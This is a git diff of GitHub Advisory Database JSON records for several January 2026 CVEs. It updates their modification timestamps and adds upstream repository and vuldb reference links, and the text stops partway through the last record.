b/advisories/unreviewed/2026/01/GHSA-9438-qf7w-49rg/GHSA-9438-qf7w-49rg.json index 81e384ab13a80..99fd51b149c94 100644 --- a/advisories/unreviewed/2026/01/GHSA-9438-qf7w-49rg/GHSA-9438-qf7w-49rg.json +++ b/advisories/unreviewed/2026/01/GHSA-9438-qf7w-49rg/GHSA-9438-qf7w-49rg.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-9438-qf7w-49rg", - "modified": "2026-01-26T06:30:28Z", + "modified": "2026-02-23T09:31:22Z", "published": "2026-01-26T06:30:28Z", "aliases": [ "CVE-2026-1417" @@ -35,6 +35,10 @@ "type": "WEB", "url": "https://github.com/enocknt/gpac/commit/f96bd57c3ccdcde4335a0be28cd3e8fe296993de" }, + { + "type": "WEB", + "url": "https://github.com/gpac/gpac" + }, { "type": "WEB", "url": "https://vuldb.com/?ctiid.342806" diff --git a/advisories/unreviewed/2026/01/GHSA-9g9c-c6jm-98g4/GHSA-9g9c-c6jm-98g4.json b/advisories/unreviewed/2026/01/GHSA-9g9c-c6jm-98g4/GHSA-9g9c-c6jm-98g4.json index 0ea1c1f3305e3..6f76eab065bef 100644 --- a/advisories/unreviewed/2026/01/GHSA-9g9c-c6jm-98g4/GHSA-9g9c-c6jm-98g4.json +++ b/advisories/unreviewed/2026/01/GHSA-9g9c-c6jm-98g4/GHSA-9g9c-c6jm-98g4.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-9g9c-c6jm-98g4", - "modified": "2026-01-19T00:30:14Z", + "modified": "2026-02-23T09:31:21Z", "published": "2026-01-19T00:30:14Z", "aliases": [ "CVE-2025-15539" @@ -35,6 +35,10 @@ "type": "WEB", "url": "https://github.com/open5gs/open5gs/commit/b4707272c1caf6a7d4dca905694ea55557a0545f" }, + { + "type": "WEB", + "url": "https://github.com/open5gs/open5gs" + }, { "type": "WEB", "url": "https://vuldb.com/?ctiid.341732" diff --git a/advisories/unreviewed/2026/01/GHSA-c99x-xcf4-fhgm/GHSA-c99x-xcf4-fhgm.json b/advisories/unreviewed/2026/01/GHSA-c99x-xcf4-fhgm/GHSA-c99x-xcf4-fhgm.json index 032a85c029a20..d027dbc65209c 100644 --- a/advisories/unreviewed/2026/01/GHSA-c99x-xcf4-fhgm/GHSA-c99x-xcf4-fhgm.json +++ b/advisories/unreviewed/2026/01/GHSA-c99x-xcf4-fhgm/GHSA-c99x-xcf4-fhgm.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-c99x-xcf4-fhgm", - "modified": "2026-01-09T18:31:37Z", + "modified": "2026-02-23T09:31:19Z", "published": "2026-01-09T18:31:37Z", "aliases": [ "CVE-2025-15496" @@ -31,6 +31,10 @@ "type": "WEB", "url": "https://github.com/guchengwuyue/yshopmall/issues/39#issue-3769727898" }, + { + "type": "WEB", + "url": "https://github.com/guchengwuyue/yshopmall" + }, { "type": "WEB", "url": "https://vuldb.com/?ctiid.340274" diff --git a/advisories/unreviewed/2026/01/GHSA-c9rh-2qq3-frxv/GHSA-c9rh-2qq3-frxv.json b/advisories/unreviewed/2026/01/GHSA-c9rh-2qq3-frxv/GHSA-c9rh-2qq3-frxv.json index 7362ca4f7f791..8739c5203d0c5 100644 --- a/advisories/unreviewed/2026/01/GHSA-c9rh-2qq3-frxv/GHSA-c9rh-2qq3-frxv.json +++ b/advisories/unreviewed/2026/01/GHSA-c9rh-2qq3-frxv/GHSA-c9rh-2qq3-frxv.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-c9rh-2qq3-frxv", - "modified": "2026-01-02T09:30:27Z", + "modified": "2026-02-23T09:31:19Z", "published": "2026-01-02T09:30:27Z", "aliases": [ "CVE-2025-15432" @@ -27,6 +27,10 @@ "type": "WEB", "url": "https://github.com/yeqifu/carRental/issues/46" }, + { + "type": "WEB", + "url": "https://github.com/yeqifu/carRental" + }, { "type": "WEB", "url": "https://vuldb.com/?ctiid.339354" diff --git a/advisories/unreviewed/2026/01/GHSA-f679-6xgj-qqcg/GHSA-f679-6xgj-qqcg.json b/advisories/unreviewed/2026/01/GHSA-f679-6xgj-qqcg/GHSA-f679-6xgj-qqcg.json index 81dcc04b6af1c..1113bdf28fbc7 100644 --- a/advisories/unreviewed/2026/01/GHSA-f679-6xgj-qqcg/GHSA-f679-6xgj-qqcg.json +++ b/advisories/unreviewed/2026/01/GHSA-f679-6xgj-qqcg/GHSA-f679-6xgj-qqcg.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-f679-6xgj-qqcg", - "modified": "2026-01-08T09:30:18Z", + "modified": "2026-02-23T09:31:19Z", "published": "2026-01-08T09:30:18Z", "aliases": [ "CVE-2026-0701" @@ -42,6 +42,10 @@ { "type": "WEB", "url": "https://vuldb.com/?submit.733002" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.733490" } ], "database_specific": { diff --git a/advisories/unreviewed/2026/01/GHSA-fgq8-gvxr-ghw7/GHSA-fgq8-gvxr-ghw7.json b/advisories/unreviewed/2026/01/GHSA-fgq8-gvxr-ghw7/GHSA-fgq8-gvxr-ghw7.json index ea111c0bee72f..a55967420b2dc 100644 --- a/advisories/unreviewed/2026/01/GHSA-fgq8-gvxr-ghw7/GHSA-fgq8-gvxr-ghw7.json +++ b/advisories/unreviewed/2026/01/GHSA-fgq8-gvxr-ghw7/GHSA-fgq8-gvxr-ghw7.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-fgq8-gvxr-ghw7", - "modified": "2026-01-01T21:30:18Z", + "modified": "2026-02-23T09:31:18Z", "published": "2026-01-01T21:30:17Z", "aliases": [ "CVE-2025-15413" @@ -31,6 +31,10 @@ "type": "WEB", "url": "https://github.com/wasm3/wasm3/issues/547" }, + { + "type": "WEB", + "url": "https://github.com/wasm3/wasm3" + }, { "type": "WEB", "url": "https://vuldb.com/?ctiid.339334" diff --git a/advisories/unreviewed/2026/01/GHSA-fprw-935f-f6f7/GHSA-fprw-935f-f6f7.json b/advisories/unreviewed/2026/01/GHSA-fprw-935f-f6f7/GHSA-fprw-935f-f6f7.json index 80b440430bd61..3e4e349d88936 100644 --- a/advisories/unreviewed/2026/01/GHSA-fprw-935f-f6f7/GHSA-fprw-935f-f6f7.json +++ b/advisories/unreviewed/2026/01/GHSA-fprw-935f-f6f7/GHSA-fprw-935f-f6f7.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-fprw-935f-f6f7", - "modified": "2026-01-02T03:30:22Z", + "modified": "2026-02-23T09:31:19Z", "published": "2026-01-02T03:30:22Z", "aliases": [ "CVE-2025-15419" @@ -39,6 +39,10 @@ "type": "WEB", "url": "https://github.com/open5gs/open5gs/commit/5aaa09907e7b9e0a326265a5f08d56f54280b5f2" }, + { + "type": "WEB", + "url": "https://github.com/open5gs/open5gs" + }, { "type": "WEB", "url": "https://vuldb.com/?ctiid.339341" diff --git a/advisories/unreviewed/2026/01/GHSA-g5rv-h647-hjj3/GHSA-g5rv-h647-hjj3.json b/advisories/unreviewed/2026/01/GHSA-g5rv-h647-hjj3/GHSA-g5rv-h647-hjj3.json index 7622baf04be39..6f2560c0c1e3a 100644 --- a/advisories/unreviewed/2026/01/GHSA-g5rv-h647-hjj3/GHSA-g5rv-h647-hjj3.json +++ b/advisories/unreviewed/2026/01/GHSA-g5rv-h647-hjj3/GHSA-g5rv-h647-hjj3.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-g5rv-h647-hjj3", - "modified": "2026-01-18T06:30:22Z", + "modified": "2026-02-23T09:31:21Z", "published": "2026-01-18T06:30:22Z", "aliases": [ "CVE-2025-15533" @@ -39,6 +39,10 @@ "type": "WEB", "url": "https://github.com/oneafter/1224/blob/main/hbf2" }, + { + "type": "WEB", + "url": "https://github.com/raysan5/raylib" + }, { "type": "WEB", "url": "https://vuldb.com/?ctiid.341705" diff --git a/advisories/unreviewed/2026/01/GHSA-gq8r-4rr6-wr2q/GHSA-gq8r-4rr6-wr2q.json b/advisories/unreviewed/2026/01/GHSA-gq8r-4rr6-wr2q/GHSA-gq8r-4rr6-wr2q.json index c12630076ed3b..251bd5ed692b9 100644 --- a/advisories/unreviewed/2026/01/GHSA-gq8r-4rr6-wr2q/GHSA-gq8r-4rr6-wr2q.json +++ b/advisories/unreviewed/2026/01/GHSA-gq8r-4rr6-wr2q/GHSA-gq8r-4rr6-wr2q.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-gq8r-4rr6-wr2q", - "modified": "2026-01-02T00:30:25Z", + "modified": "2026-02-23T09:31:18Z", "published": "2026-01-02T00:30:25Z", "aliases": [ "CVE-2025-15418" @@ -39,6 +39,10 @@ "type": "WEB", "url": "https://github.com/open5gs/open5gs/commit/4e913d21f2c032b187815f063dbab5ebe65fe83a" }, + { + "type": "WEB", + "url": "https://github.com/open5gs/open5gs" + }, { "type": "WEB", "url": "https://vuldb.com/?ctiid.339340" diff --git a/advisories/unreviewed/2026/01/GHSA-grwh-fmhg-rqcq/GHSA-grwh-fmhg-rqcq.json b/advisories/unreviewed/2026/01/GHSA-grwh-fmhg-rqcq/GHSA-grwh-fmhg-rqcq.json index dfb6d4573f511..8fceb5c6f8f5e 100644 --- a/advisories/unreviewed/2026/01/GHSA-grwh-fmhg-rqcq/GHSA-grwh-fmhg-rqcq.json +++ b/advisories/unreviewed/2026/01/GHSA-grwh-fmhg-rqcq/GHSA-grwh-fmhg-rqcq.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-grwh-fmhg-rqcq", - "modified": "2026-01-19T18:30:28Z", + "modified": "2026-02-23T09:31:21Z", "published": "2026-01-19T18:30:28Z", "aliases": [ "CVE-2026-1170" @@ -27,6 +27,10 @@ "type": "WEB", "url": "https://github.com/birkir/prime/issues/541" }, + { + "type": "WEB", + "url": "https://github.com/birkir/prime" + }, { "type": "WEB", "url": "https://vuldb.com/?ctiid.341764" diff --git a/advisories/unreviewed/2026/01/GHSA-h4jj-hgv3-ppwg/GHSA-h4jj-hgv3-ppwg.json b/advisories/unreviewed/2026/01/GHSA-h4jj-hgv3-ppwg/GHSA-h4jj-hgv3-ppwg.json index 346ef7685facc..aa6c50d0183cc 100644 --- a/advisories/unreviewed/2026/01/GHSA-h4jj-hgv3-ppwg/GHSA-h4jj-hgv3-ppwg.json +++ b/advisories/unreviewed/2026/01/GHSA-h4jj-hgv3-ppwg/GHSA-h4jj-hgv3-ppwg.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-h4jj-hgv3-ppwg", - "modified": "2026-01-02T06:30:26Z", + "modified": "2026-02-23T09:31:19Z", "published": "2026-01-02T06:30:26Z", "aliases": [ "CVE-2025-15431" diff --git a/advisories/unreviewed/2026/01/GHSA-hqj6-7698-rxx4/GHSA-hqj6-7698-rxx4.json b/advisories/unreviewed/2026/01/GHSA-hqj6-7698-rxx4/GHSA-hqj6-7698-rxx4.json index bd49fa9e2074f..d61ebb4b1fba1 100644 --- a/advisories/unreviewed/2026/01/GHSA-hqj6-7698-rxx4/GHSA-hqj6-7698-rxx4.json +++ b/advisories/unreviewed/2026/01/GHSA-hqj6-7698-rxx4/GHSA-hqj6-7698-rxx4.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-hqj6-7698-rxx4", - "modified": "2026-01-26T09:30:18Z", + "modified": "2026-02-23T09:31:22Z", "published": "2026-01-26T09:30:18Z", "aliases": [ "CVE-2026-1425" @@ -27,6 +27,10 @@ "type": "WEB", "url": "https://github.com/pymumu/smartdns/commit/2d57c4b4e1add9b4537aeb403f794a084727e1c8" }, + { + "type": "WEB", + "url": "https://github.com/pymumu/smartdns" + }, { "type": "WEB", "url": "https://vuldb.com/?ctiid.342841" diff --git a/advisories/unreviewed/2026/01/GHSA-j6q4-mvcw-hpgm/GHSA-j6q4-mvcw-hpgm.json b/advisories/unreviewed/2026/01/GHSA-j6q4-mvcw-hpgm/GHSA-j6q4-mvcw-hpgm.json index 8f2f07c3715b2..f5306d5de9a7d 100644 --- a/advisories/unreviewed/2026/01/GHSA-j6q4-mvcw-hpgm/GHSA-j6q4-mvcw-hpgm.json +++ b/advisories/unreviewed/2026/01/GHSA-j6q4-mvcw-hpgm/GHSA-j6q4-mvcw-hpgm.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-j6q4-mvcw-hpgm", - "modified": "2026-01-19T09:30:27Z", + "modified": "2026-02-23T09:31:21Z", "published": "2026-01-19T09:30:27Z", "aliases": [ "CVE-2026-1141" @@ -42,6 +42,10 @@ { "type": "WEB", "url": "https://vuldb.com/?submit.735483" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.736668" } ], "database_specific": { diff --git a/advisories/unreviewed/2026/01/GHSA-jqv9-g2ph-pfw9/GHSA-jqv9-g2ph-pfw9.json b/advisories/unreviewed/2026/01/GHSA-jqv9-g2ph-pfw9/GHSA-jqv9-g2ph-pfw9.json index 6c9d7577f159f..9332129b72a2e 100644 --- a/advisories/unreviewed/2026/01/GHSA-jqv9-g2ph-pfw9/GHSA-jqv9-g2ph-pfw9.json +++ b/advisories/unreviewed/2026/01/GHSA-jqv9-g2ph-pfw9/GHSA-jqv9-g2ph-pfw9.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-jqv9-g2ph-pfw9", - "modified": "2026-01-19T09:30:28Z", + "modified": "2026-02-23T09:31:21Z", "published": "2026-01-19T09:30:28Z", "aliases": [ "CVE-2026-1145" @@ -39,6 +39,10 @@ "type": "WEB", "url": "https://github.com/paralin/quickjs/commit/53aebe66170d545bb6265906fe4324e4477de8b4" }, + { + "type": "WEB", + "url": "https://github.com/quickjs-ng/quickjs" + }, { "type": "WEB", "url": "https://vuldb.com/?ctiid.341738" diff --git a/advisories/unreviewed/2026/01/GHSA-jvvr-947r-5jcr/GHSA-jvvr-947r-5jcr.json b/advisories/unreviewed/2026/01/GHSA-jvvr-947r-5jcr/GHSA-jvvr-947r-5jcr.json index 50499ba3d227b..01460277852a0 100644 --- a/advisories/unreviewed/2026/01/GHSA-jvvr-947r-5jcr/GHSA-jvvr-947r-5jcr.json +++ b/advisories/unreviewed/2026/01/GHSA-jvvr-947r-5jcr/GHSA-jvvr-947r-5jcr.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-jvvr-947r-5jcr", - "modified": "2026-01-17T18:30:19Z", + "modified": "2026-02-23T09:31:20Z", "published": "2026-01-17T18:30:19Z", "aliases": [ "CVE-2026-1048" @@ -31,6 +31,10 @@ "type": "WEB", "url": "https://github.com/LigeroSmart/ligerosmart/issues/279#issue-3775562926" }, + { + "type": "WEB", + "url": "https://github.com/LigeroSmart/ligerosmart" + }, { "type": "WEB", "url": "https://vuldb.com/?ctiid.341600" diff --git a/advisories/unreviewed/2026/01/GHSA-m43m-9cwc-jq98/GHSA-m43m-9cwc-jq98.json b/advisories/unreviewed/2026/01/GHSA-m43m-9cwc-jq98/GHSA-m43m-9cwc-jq98.json index 7b089d611954a..c172a0f1c9848 100644 --- a/advisories/unreviewed/2026/01/GHSA-m43m-9cwc-jq98/GHSA-m43m-9cwc-jq98.json +++ b/advisories/unreviewed/2026/01/GHSA-m43m-9cwc-jq98/GHSA-m43m-9cwc-jq98.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-m43m-9cwc-jq98", - "modified": "2026-01-18T12:31:06Z", + "modified": "2026-02-23T09:31:21Z", "published": "2026-01-18T12:31:06Z", "aliases": [ "CVE-2025-15537" @@ -27,6 +27,10 @@ "type": "WEB", "url": "https://github.com/mapnik/mapnik/issues/4543" }, + { + "type": "WEB", + "url": "https://github.com/mapnik/mapnik" + }, { "type": "WEB", "url": "https://github.com/oneafter/1218/blob/main/repro" diff --git a/advisories/unreviewed/2026/01/GHSA-m9r7-9m8m-9f64/GHSA-m9r7-9m8m-9f64.json b/advisories/unreviewed/2026/01/GHSA-m9r7-9m8m-9f64/GHSA-m9r7-9m8m-9f64.json index 546a3ab14a7f0..7d224d05b54a9 100644 --- a/advisories/unreviewed/2026/01/GHSA-m9r7-9m8m-9f64/GHSA-m9r7-9m8m-9f64.json +++ b/advisories/unreviewed/2026/01/GHSA-m9r7-9m8m-9f64/GHSA-m9r7-9m8m-9f64.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-m9r7-9m8m-9f64", - "modified": "2026-01-05T21:30:33Z", + "modified": "2026-02-23T09:31:19Z", "published": "2026-01-05T21:30:33Z", "aliases": [ "CVE-2026-0605" @@ -46,6 +46,10 @@ { "type": "WEB", "url": "https://vuldb.com/?submit.731695" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.732595" } ], "database_specific": { diff --git a/advisories/unreviewed/2026/01/GHSA-mf3r-3jp8-f7f5/GHSA-mf3r-3jp8-f7f5.json b/advisories/unreviewed/2026/01/GHSA-mf3r-3jp8-f7f5/GHSA-mf3r-3jp8-f7f5.json index 0ea5c699256b0..15f1443f24fa1 100644 --- a/advisories/unreviewed/2026/01/GHSA-mf3r-3jp8-f7f5/GHSA-mf3r-3jp8-f7f5.json +++ b/advisories/unreviewed/2026/01/GHSA-mf3r-3jp8-f7f5/GHSA-mf3r-3jp8-f7f5.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-mf3r-3jp8-f7f5", - "modified": "2026-01-05T03:30:27Z", + "modified": "2026-02-23T09:31:19Z", "published": "2026-01-05T03:30:27Z", "aliases": [ "CVE-2025-15450" @@ -31,6 +31,10 @@ "type": "WEB", "url": "https://github.com/sfturing/hosp_order/issues/111#issue-3760306826" }, + { + "type": "WEB", + "url": "https://github.com/sfturing/hosp_order" + }, { "type": "WEB", "url": "https://vuldb.com/?ctiid.339483" diff --git a/advisories/unreviewed/2026/01/GHSA-mp27-9vf3-rfc6/GHSA-mp27-9vf3-rfc6.json b/advisories/unreviewed/2026/01/GHSA-mp27-9vf3-rfc6/GHSA-mp27-9vf3-rfc6.json index 495d72b855695..28f00377ed3d2 100644 --- a/advisories/unreviewed/2026/01/GHSA-mp27-9vf3-rfc6/GHSA-mp27-9vf3-rfc6.json +++ b/advisories/unreviewed/2026/01/GHSA-mp27-9vf3-rfc6/GHSA-mp27-9vf3-rfc6.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-mp27-9vf3-rfc6", - "modified": "2026-01-02T00:30:25Z", + "modified": "2026-02-23T09:31:18Z", "published": "2026-01-02T00:30:25Z", "aliases": [ "CVE-2025-15417" @@ -39,6 +39,10 @@ "type": "WEB", "url": "https://github.com/open5gs/open5gs/commit/465273d13ba5d47b274c38c9d1b07f04859178a1" }, + { + "type": "WEB", + "url": "https://github.com/open5gs/open5gs" + }, { "type": "WEB", "url": "https://vuldb.com/?ctiid.339339" diff --git a/advisories/unreviewed/2026/01/GHSA-mw2p-3c2q-3gxg/GHSA-mw2p-3c2q-3gxg.json b/advisories/unreviewed/2026/01/GHSA-mw2p-3c2q-3gxg/GHSA-mw2p-3c2q-3gxg.json index 94e147fb5b659..12fa0132d3f2b 100644 --- a/advisories/unreviewed/2026/01/GHSA-mw2p-3c2q-3gxg/GHSA-mw2p-3c2q-3gxg.json +++ b/advisories/unreviewed/2026/01/GHSA-mw2p-3c2q-3gxg/GHSA-mw2p-3c2q-3gxg.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-mw2p-3c2q-3gxg", - "modified": "2026-01-01T21:30:17Z", + "modified": "2026-02-23T09:31:18Z", "published": "2026-01-01T21:30:17Z", "aliases": [ "CVE-2025-15411" @@ -27,6 +27,10 @@ "type": "WEB", "url": "https://github.com/WebAssembly/wabt/issues/2679" }, + { + "type": "WEB", + "url": "https://github.com/WebAssembly/wabt" + }, { "type": "WEB", "url": "https://github.com/oneafter/1208/blob/main/af1" @@ -42,6 +46,10 @@ { "type": "WEB", "url": "https://vuldb.com/?submit.719825" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.736404" } ], "database_specific": { diff --git a/advisories/unreviewed/2026/01/GHSA-q4m9-3fr6-f83p/GHSA-q4m9-3fr6-f83p.json b/advisories/unreviewed/2026/01/GHSA-q4m9-3fr6-f83p/GHSA-q4m9-3fr6-f83p.json index 788580add9950..7b636878464ee 100644 --- a/advisories/unreviewed/2026/01/GHSA-q4m9-3fr6-f83p/GHSA-q4m9-3fr6-f83p.json +++ b/advisories/unreviewed/2026/01/GHSA-q4m9-3fr6-f83p/GHSA-q4m9-3fr6-f83p.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-q4m9-3fr6-f83p", - "modified": "2026-01-26T06:30:28Z", + "modified": "2026-02-23T09:31:22Z", "published": "2026-01-26T06:30:28Z", "aliases": [ "CVE-2026-1416" @@ -35,6 +35,10 @@ "type": "WEB", "url": "https://github.com/enocknt/gpac/commit/d45c264c20addf0c1cc05124ede33f8ffa800e68" }, + { + "type": "WEB", + "url": "https://github.com/gpac/gpac" + }, { "type": "WEB", "url": "https://vuldb.com/?ctiid.342805" diff --git a/advisories/unreviewed/2026/01/GHSA-q4xv-cr27-98cp/GHSA-q4xv-cr27-98cp.json b/advisories/unreviewed/2026/01/GHSA-q4xv-cr27-98cp/GHSA-q4xv-cr27-98cp.json index 49fbd400503da..5c22a1f83a95b 100644 --- a/advisories/unreviewed/2026/01/GHSA-q4xv-cr27-98cp/GHSA-q4xv-cr27-98cp.json +++ b/advisories/unreviewed/2026/01/GHSA-q4xv-cr27-98cp/GHSA-q4xv-cr27-98cp.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-q4xv-cr27-98cp", - "modified": "2026-01-29T15:30:27Z", + "modified": "2026-02-23T09:31:23Z", "published": "2026-01-29T15:30:27Z", "aliases": [ "CVE-2026-1587" @@ -35,6 +35,10 @@ "type": "WEB", "url": "https://github.com/open5gs/open5gs/issues/4272#issue-3795156752" }, + { + "type": "WEB", + "url": "https://github.com/open5gs/open5gs" + }, { "type": "WEB", "url": "https://vuldb.com/?ctiid.343350" diff --git a/advisories/unreviewed/2026/01/GHSA-q9fv-9fr9-69p3/GHSA-q9fv-9fr9-69p3.json b/advisories/unreviewed/2026/01/GHSA-q9fv-9fr9-69p3/GHSA-q9fv-9fr9-69p3.json index 0bbe4ae72600b..9729c269aa6c2 100644 --- a/advisories/unreviewed/2026/01/GHSA-q9fv-9fr9-69p3/GHSA-q9fv-9fr9-69p3.json +++ b/advisories/unreviewed/2026/01/GHSA-q9fv-9fr9-69p3/GHSA-q9fv-9fr9-69p3.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-q9fv-9fr9-69p3", - "modified": "2026-01-01T21:30:18Z", + "modified": "2026-02-23T09:31:18Z", "published": "2026-01-01T21:30:17Z", "aliases": [ "CVE-2025-15412" @@ -27,6 +27,10 @@ "type": "WEB", "url": "https://github.com/WebAssembly/wabt/issues/2678" }, + { + "type": "WEB", + "url": "https://github.com/WebAssembly/wabt" + }, { "type": "WEB", "url": "https://github.com/oneafter/1208/blob/main/af1" diff --git a/advisories/unreviewed/2026/01/GHSA-qvgm-c3f9-m43m/GHSA-qvgm-c3f9-m43m.json b/advisories/unreviewed/2026/01/GHSA-qvgm-c3f9-m43m/GHSA-qvgm-c3f9-m43m.json index 892fcee0ea54d..8bacd08b6c8fc 100644 --- a/advisories/unreviewed/2026/01/GHSA-qvgm-c3f9-m43m/GHSA-qvgm-c3f9-m43m.json +++ b/advisories/unreviewed/2026/01/GHSA-qvgm-c3f9-m43m/GHSA-qvgm-c3f9-m43m.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-qvgm-c3f9-m43m", - "modified": "2026-01-19T21:33:11Z", + "modified": "2026-02-23T09:31:21Z", "published": "2026-01-19T21:33:11Z", "aliases": [ "CVE-2026-1171" @@ -27,6 +27,10 @@ "type": "WEB", "url": "https://github.com/birkir/prime/issues/542" }, + { + "type": "WEB", + "url": "https://github.com/birkir/prime" + }, { "type": "WEB", "url": "https://vuldb.com/?ctiid.341765" diff --git a/advisories/unreviewed/2026/01/GHSA-r58r-mmgc-mr7f/GHSA-r58r-mmgc-mr7f.json b/advisories/unreviewed/2026/01/GHSA-r58r-mmgc-mr7f/GHSA-r58r-mmgc-mr7f.json index f6f42b505f88b..31c3f5e75256e 100644 --- a/advisories/unreviewed/2026/01/GHSA-r58r-mmgc-mr7f/GHSA-r58r-mmgc-mr7f.json +++ b/advisories/unreviewed/2026/01/GHSA-r58r-mmgc-mr7f/GHSA-r58r-mmgc-mr7f.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-r58r-mmgc-mr7f", - "modified": "2026-01-26T03:30:34Z", + "modified": "2026-02-23T09:31:22Z", "published": "2026-01-26T03:30:34Z", "aliases": [ "CVE-2026-1415" @@ -35,6 +35,10 @@ "type": "WEB", "url": "https://github.com/enocknt/gpac/commit/af951b892dfbaaa38336ba2eba6d6a42c25810fd" }, + { + "type": "WEB", + "url": "https://github.com/gpac/gpac" + }, { "type": "WEB", "url": "https://vuldb.com/?ctiid.342804" diff --git a/advisories/unreviewed/2026/01/GHSA-rcpp-qhfh-r47v/GHSA-rcpp-qhfh-r47v.json b/advisories/unreviewed/2026/01/GHSA-rcpp-qhfh-r47v/GHSA-rcpp-qhfh-r47v.json index 42db22f77be1f..9937f49a23485 100644 --- a/advisories/unreviewed/2026/01/GHSA-rcpp-qhfh-r47v/GHSA-rcpp-qhfh-r47v.json +++ b/advisories/unreviewed/2026/01/GHSA-rcpp-qhfh-r47v/GHSA-rcpp-qhfh-r47v.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-rcpp-qhfh-r47v", - "modified": "2026-01-10T15:31:22Z", + "modified": "2026-02-23T09:31:19Z", "published": "2026-01-10T15:31:22Z", "aliases": [ "CVE-2026-0821" @@ -39,6 +39,10 @@ "type": "WEB", "url": "https://github.com/quickjs-ng/quickjs/commit/c5d80831e51e48a83eab16ea867be87f091783c5" }, + { + "type": "WEB", + "url": "https://github.com/quickjs-ng/quickjs" + }, { "type": "WEB", "url": "https://vuldb.com/?ctiid.340355" diff --git a/advisories/unreviewed/2026/01/GHSA-rf69-3jvx-93qp/GHSA-rf69-3jvx-93qp.json b/advisories/unreviewed/2026/01/GHSA-rf69-3jvx-93qp/GHSA-rf69-3jvx-93qp.json index 3402670f11668..e9ea2825dc54e 100644 --- a/advisories/unreviewed/2026/01/GHSA-rf69-3jvx-93qp/GHSA-rf69-3jvx-93qp.json +++ b/advisories/unreviewed/2026/01/GHSA-rf69-3jvx-93qp/GHSA-rf69-3jvx-93qp.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-rf69-3jvx-93qp", - "modified": "2026-01-18T18:30:16Z", + "modified": "2026-02-23T09:31:21Z", "published": "2026-01-18T18:30:16Z", "aliases": [ "CVE-2026-1126" @@ -23,6 +23,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1126" }, + { + "type": "WEB", + "url": "https://gitee.com/lwj/flow" + }, { "type": "WEB", "url": "https://gitee.com/lwj/flow/issues/IDIQSE" diff --git a/advisories/unreviewed/2026/01/GHSA-vrx4-99h7-rgjh/GHSA-vrx4-99h7-rgjh.json b/advisories/unreviewed/2026/01/GHSA-vrx4-99h7-rgjh/GHSA-vrx4-99h7-rgjh.json index ea1b0e5ab2107..e830fc4fd9686 100644 --- a/advisories/unreviewed/2026/01/GHSA-vrx4-99h7-rgjh/GHSA-vrx4-99h7-rgjh.json +++ b/advisories/unreviewed/2026/01/GHSA-vrx4-99h7-rgjh/GHSA-vrx4-99h7-rgjh.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-vrx4-99h7-rgjh", - "modified": "2026-01-02T06:30:26Z", + "modified": "2026-02-23T09:31:19Z", "published": "2026-01-02T06:30:26Z", "aliases": [ "CVE-2025-15430" diff --git a/advisories/unreviewed/2026/01/GHSA-x3rh-6rvx-g8m2/GHSA-x3rh-6rvx-g8m2.json b/advisories/unreviewed/2026/01/GHSA-x3rh-6rvx-g8m2/GHSA-x3rh-6rvx-g8m2.json index 179cfe8b3d34c..2be5f8370e2f1 100644 --- a/advisories/unreviewed/2026/01/GHSA-x3rh-6rvx-g8m2/GHSA-x3rh-6rvx-g8m2.json +++ b/advisories/unreviewed/2026/01/GHSA-x3rh-6rvx-g8m2/GHSA-x3rh-6rvx-g8m2.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-x3rh-6rvx-g8m2", - "modified": "2026-01-02T03:30:22Z", + "modified": "2026-02-23T09:31:19Z", "published": "2026-01-02T03:30:22Z", "aliases": [ "CVE-2025-15425" @@ -42,6 +42,10 @@ { "type": "WEB", "url": "https://vuldb.com/?submit.721352" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.734567" } ], "database_specific": { diff --git a/advisories/unreviewed/2026/01/GHSA-xc7m-2p37-4qw2/GHSA-xc7m-2p37-4qw2.json b/advisories/unreviewed/2026/01/GHSA-xc7m-2p37-4qw2/GHSA-xc7m-2p37-4qw2.json index 6388b9e8ca6bc..9dde97c659476 100644 --- a/advisories/unreviewed/2026/01/GHSA-xc7m-2p37-4qw2/GHSA-xc7m-2p37-4qw2.json +++ b/advisories/unreviewed/2026/01/GHSA-xc7m-2p37-4qw2/GHSA-xc7m-2p37-4qw2.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-xc7m-2p37-4qw2", - "modified": 